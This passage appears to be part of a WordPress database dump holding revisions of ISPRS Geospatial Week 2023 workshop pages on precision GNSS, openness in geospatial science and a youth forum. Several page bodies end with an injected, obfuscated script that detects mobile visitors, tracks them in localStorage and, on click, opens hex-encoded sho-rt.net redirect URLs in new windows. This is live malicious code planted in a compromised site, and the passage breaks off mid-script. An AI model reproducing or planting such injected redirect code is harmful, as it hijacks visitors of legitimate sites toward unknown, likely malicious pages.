|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','inherit','closed','closed','','3452-revision-v1','','','2023-02-05 14:42:20','2023-02-05 14:42:20','',3452,'https://gsw2023.com/?p=3848',0,'revision','',0),
(3849,1,'2023-02-05 14:42:57','2023-02-05 14:42:57','[vc_row][vc_column width=\"1/4\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][vc_single_image image=\"3499\" img_size=\"600x600\" alignment=\"center\"][/vc_column][vc_column width=\"3/4\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Openness in Geospatial and Remote Sensing</span></strong></h5>\r\n&nbsp;\r\n<h5 style=\"text-align: justify;\"><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\r\n<h5 style=\"text-align: justify;\"><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\r\n<h5 style=\"text-align: justify;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II Openness in Geospatial Science and Remote Sensing. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"100px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>Advancements in and applications of Open Source Software for Geospatial</li>\r\n 	<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\r\n 	<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\r\n 	<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\r\n 	<li>Use cases and applications based on Open Standards</li>\r\n 	<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\r\n 	<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\r\n 	<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\r\n 	<li>Open Innovation and Participatory Research</li>\r\n</ul>\r\n&nbsp;\r\n<h5><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\r\n 	<li>Peter Mooney, Maynooth University, Ireland</li>\r\n 	<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\r\n 	<li>Claudia Vitolo, European Space Agency, Italy</li>\r\n 	<li>Stefanie Lumnitz, European Space Agency, Italy</li>\r\n 	<li>Stephan Meissl, EOX IT Services, Austria</li>\r\n 	<li>Alessandro Sarretta, National Research Council, Italy</li>\r\n 	<li>Alexander Kotsev, European Commission – Joint Research Centre (JRC), Italy</li>\r\n</ul>\r\nOther members to be added\r\n\r\n&nbsp;\r\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\r\n<ul>\r\n 	<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-02-05 14:42:57','2023-02-05 14:42:57','',3497,'https://gsw2023.com/?p=3849',0,'revision','',0),
(3850,1,'2023-02-05 14:47:39','2023-02-05 14:47:39','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3618\" img_size=\"600x400\"][vc_single_image image=\"3620\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Youth Presentation Forum</span></strong></h5>\r\n&nbsp;\r\n<h5 style=\"text-align: justify;\">The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.\r\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.\r\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.\r\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\">Forum Organizers</h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"68\"][vc_separator color=\"peacoc\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong>Themes of the event:</strong></h5>\r\nWe welcome papers from students and young researchers submitting their research in all the areas using RS, GIS and Photogrammetry technologies in addition to the following themes:\r\n⦁ GIS and Remote Sensing (RS) For a Sustainable Future.\r\n⦁ Applications of Machine Learning in Geospatial Technologies.\r\n⦁ Use of Open Source Tools/Technologies in GIS and Remote Sensing.\r\n⦁ Crowdsourcing and Citizen Science in Geospatial Sector.\r\n⦁ GIS Education and Outreach Activities.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h5><strong>Featuring Forum Report in ISPRS SC Newsletter:</strong></h5>\r\nWe accept both the abstracts and full papers that have been submitted by following ISPRS guidelines. After the forum, authors of the selected papers will be invited to submit an article detailing their research to the “Spectrum” (ISPRS SC Newsletter), in its Spotlight section. We will also feature the summary of this event in the Spectrum.[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( 